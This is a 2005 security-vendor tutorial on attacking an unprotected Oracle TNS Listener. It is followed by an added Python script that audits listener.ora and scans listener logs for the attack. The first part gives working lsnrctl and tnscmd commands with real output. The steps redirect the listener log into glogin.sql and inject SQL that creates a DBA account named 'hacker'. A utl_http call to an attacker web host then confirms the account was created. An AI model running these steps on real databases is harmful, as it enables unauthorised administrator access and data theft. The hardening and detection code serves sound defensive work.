Example: how to hack an Oracle database via an unprotected TNS Listener (7.3 - 9i Rel. 2)

Required Software:

Step 1: Change the name of the log_file

If the TNS Listener is not protected, we can rename the TNS listener logfile. There are several potential filenames of interest to an attacker:

* .rhosts (if the RSH service is running). We can then connect to the host directly by running rlogin -l ip-address
* glogin.sql (or login.sql). This file is executed every time a process or user (e.g. the DBA) starts SQL*Plus on the server
* boot.ini (on Windows we can corrupt the boot.ini)

Start lsnrctl and run the following command:

    LSNRCTL> set log_file C:\oracle\ora92\sqlplus\admin\glogin.sql
    Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.2.151)(PORT=1521)))
    LISTENER parameter "log_file" set to C:\oracle\ora92\sqlplus\admin\glogin.sql
    The command completed successfully

Check that the listener log now points to glogin.sql by submitting a status command:

    LSNRCTL> status
    Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=IPC)(KEY=EXTPROC)))
    Connecting to (DESCRIPTION=(ADDRESS=(PROTOCOL=TCP)(HOST=192.168.2.151)(PORT=1521)))
    STATUS of the LISTENER
    ------------------------
    Alias                     LISTENER
    Version                   TNSLSNR for 32-bit Windows: Version 9.2.0.6.0 - Production
    Start Date                25-APR-2005 10:05:46
    Uptime                    0 days 0 hr. 15 min. 45 sec
    Trace Level               off
    Security                  OFF
    SNMP                      OFF
    Listener Log File         C:\oracle\ora92\sqlplus\admin\glogin.sql
    Listening Endpoints Summary...
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=uhura90201.red-database-security.com)(PORT=1521)))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=uhura90201.red-database-security.com)(PORT=8080))(Presentation=HTTP)(Session=RAW))
      (DESCRIPTION=(ADDRESS=(PROTOCOL=tcp)(HOST=uhura90201.red-database-security.com)(PORT=2100))(Presentation=FTP)(Session=RAW))
    Services Summary...
    Service "ora90201" has 1 instance(s).
      Instance "ora90201", status READY, has 1 handler(s) for this service...
    Service "ora90201XDB" has 1 instance(s).
      Instance "ora90201", status READY, has 1 handler(s) for this service...
    The command completed successfully
    LSNRCTL> exit

Step 2: Send a string to glogin.sql

Now we write content into the file. The content depends on the file chosen. For .rhosts we can send "+ +"; for glogin.sql we could use the following example:

    [user@picard root]# perl tnscmd -h 192.168.2.156 -p 1521 --rawcmd "(CONNECT_DATA=((
    > create user hacker identified by hacker;
    > grant dba to hacker;
    > "
    sending (CONNECT_DATA=((
    set term off
    create user hacker identified by hacker;
    grant dba to hacker;
    set term on
     to 192.168.2.156:1521
    writing 138 bytes
    reading
    .Q......"..E(DESCRIPTION=(ERR=1153)(VSNNUM=153093632)(ERROR_STACK=(ERROR=(CODE=1153)(EMFI=4)(ARGS='(CONNECT_DATA=((. create user hacker identified by hacker;.grant dba to hacker;'))(ERROR=(CODE=303)(EMFI=1))))
    [user@picard root]#

Step 3: Set the logfile back to the old value

Set the name of the logfile back to its original value:

    LSNRCTL> set log_file C:\oracle\ora92\network\log\listener.log
    Connection to (ADDRESS=(PROTOCOL=tcp)(PORT=1521))
    LISTENER Parameter "log_file" set to C:\oracle\ora92\network\log\listener.log
    The command completed successfully.

Step 4: Login as hacker/hacker@database

The next time the DBA (or a process/job) starts SQL*Plus on the server, glogin.sql is executed and the database user hacker is created. If you append the following command to glogin.sql, your webserver logfile shows whether the Oracle user was created:

    SELECT utl_http.request('http://www.evildba.com/user_hacker_created') from dual;

References

© 2005 by Red-Database-Security GmbH - last update 02-nov-2005
Hardening TNS-Listener
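As an added defender-side example (not part of the original page), the following Python script shows the two checks that matter against the technique described in steps 1 to 4: auditing listener.ora for ADMIN_RESTRICTIONS_<listener> = ON (which makes the listener refuse runtime SET commands such as set log_file) and for a listener password (the 9i-era control), and scanning listener.log for administrative commands that retarget the log or trace file from a host other than the database server. The trusted host name, the expected log directory, the listener.ora fragments and the log lines are all constructed for the example; the log-line layout follows the general "timestamp * connect data * command * return code" form of Oracle listener logs, but the exact fields vary between releases.

```python
import re

# lsnrctl SET parameters whose remote use is the footprint of the technique
# above (log_file in steps 1 and 3) or is otherwise high impact for the listener.
SENSITIVE_COMMANDS = {"log_file", "log_directory", "trc_file",
                      "trc_directory", "trc_level", "password", "stop"}

# Assumptions for this example: the database host itself is the only
# legitimate source of administrative commands, and listener logs live here.
TRUSTED_ADMIN_HOSTS = {"uhura90201"}
EXPECTED_LOG_DIR = r"C:\oracle\ora92\network\log"

# Constructed listener.ora fragments: the first accepts remote SET commands,
# the second refuses them. PASSWORDS_LISTENER normally holds the value written
# by 'lsnrctl change_password'; the placeholder stands in for it here.
LISTENER_ORA_WEAK = """
LISTENER =
  (DESCRIPTION_LIST =
    (DESCRIPTION =
      (ADDRESS = (PROTOCOL = TCP)(HOST = 192.168.2.151)(PORT = 1521))
    )
  )
"""
LISTENER_ORA_HARDENED = LISTENER_ORA_WEAK + """
ADMIN_RESTRICTIONS_LISTENER = ON
PASSWORDS_LISTENER = (PLACEHOLDER_VALUE_WRITTEN_BY_CHANGE_PASSWORD)
"""

# Constructed listener.log entries in the general
# 'timestamp * connect_data * command * return_code' layout (fields vary by
# release). Entry 3 mirrors step 1 above (log_file pointed at glogin.sql from
# a remote host); entry 4 mirrors the reset in step 3.
SAMPLE_LOG = r"""
25-APR-2005 10:05:46 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=uhura90201)(USER=oracle))(COMMAND=status)(ARGUMENTS=64)(SERVICE=LISTENER)(VERSION=153092608)) * status * 0
25-APR-2005 10:18:02 * (CONNECT_DATA=(SERVICE_NAME=ora90201)(CID=(PROGRAM=sqlplus)(HOST=uhura90201)(USER=oracle))) * (ADDRESS=(PROTOCOL=tcp)(HOST=192.168.2.151)(PORT=3341)) * establish * ora90201 * 0
25-APR-2005 10:20:11 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=picard)(USER=user))(COMMAND=log_file)(ARGUMENTS=4)(VALUE=C:\oracle\ora92\sqlplus\admin\glogin.sql)(SERVICE=LISTENER)(VERSION=153093632)) * log_file * 0
25-APR-2005 10:24:30 * (CONNECT_DATA=(CID=(PROGRAM=)(HOST=picard)(USER=user))(COMMAND=log_file)(ARGUMENTS=4)(VALUE=C:\oracle\ora92\network\log\listener.log)(SERVICE=LISTENER)(VERSION=153093632)) * log_file * 0
"""


def parse_admin_entry(line):
    """Return a dict for an administrative log entry, None for anything else."""
    tokens = line.strip().split(" * ")
    if len(tokens) < 3:
        return None
    cmd = re.search(r"\(COMMAND=(\w+)\)", tokens[1])
    if not cmd:
        return None  # connection ('establish') entries carry no COMMAND field
    host = re.search(r"\(HOST=([^)]*)\)", tokens[1])
    value = re.search(r"\(VALUE=([^)]*)\)", tokens[1])
    return {
        "ts": tokens[0],
        "cmd": cmd.group(1).lower(),
        "host": host.group(1) if host else "",
        "value": value.group(1) if value else "",
        "rc": tokens[-1].strip(),
    }


def flag_entry(entry):
    """Reasons this administrative entry deserves attention; empty if none."""
    reasons = []
    if entry["cmd"] not in SENSITIVE_COMMANDS:
        return reasons
    if entry["host"] not in TRUSTED_ADMIN_HOSTS:
        reasons.append(f"remote '{entry['cmd']}' from host '{entry['host']}'")
    if entry["cmd"] in ("log_file", "trc_file") and entry["value"]:
        v = entry["value"].lower()
        # A log or trace file outside the log directory, or without a log/trace
        # extension, is the signature of step 1 (e.g. glogin.sql, .rhosts).
        if not (v.startswith(EXPECTED_LOG_DIR.lower()) and v.endswith((".log", ".trc"))):
            reasons.append(f"{entry['cmd']} retargeted to '{entry['value']}'")
    return reasons


def scan_listener_log(text):
    """Return [(timestamp, [reasons])] for every flagged administrative entry."""
    hits = []
    for line in text.splitlines():
        entry = parse_admin_entry(line)
        if entry:
            reasons = flag_entry(entry)
            if reasons:
                hits.append((entry["ts"], reasons))
    return hits


def audit_listener_ora(text):
    """Findings for a listener.ora lacking the controls that stop remote SET commands."""
    findings = []
    if not re.search(r"^\s*ADMIN_RESTRICTIONS_\w+\s*=\s*ON\b", text, re.I | re.M):
        findings.append("ADMIN_RESTRICTIONS_<listener> is not ON: remote SET commands are accepted")
    if not re.search(r"^\s*PASSWORDS_\w+\s*=", text, re.I | re.M):
        findings.append("no PASSWORDS_<listener> entry: the listener has no password")
    return findings


if __name__ == "__main__":
    for name, ora in (("weak", LISTENER_ORA_WEAK), ("hardened", LISTENER_ORA_HARDENED)):
        print(name, audit_listener_ora(ora) or ["ok"])
    for ts, reasons in scan_listener_log(SAMPLE_LOG):
        print(ts, "; ".join(reasons))
```

Once log_file has been redirected, later listener entries (possibly including the reset in step 3) are written to the new target rather than to listener.log, so a scan of listener.log alone may show only the first redirect; that is why the ADMIN_RESTRICTIONS parameter, not log review, is the control to rely on.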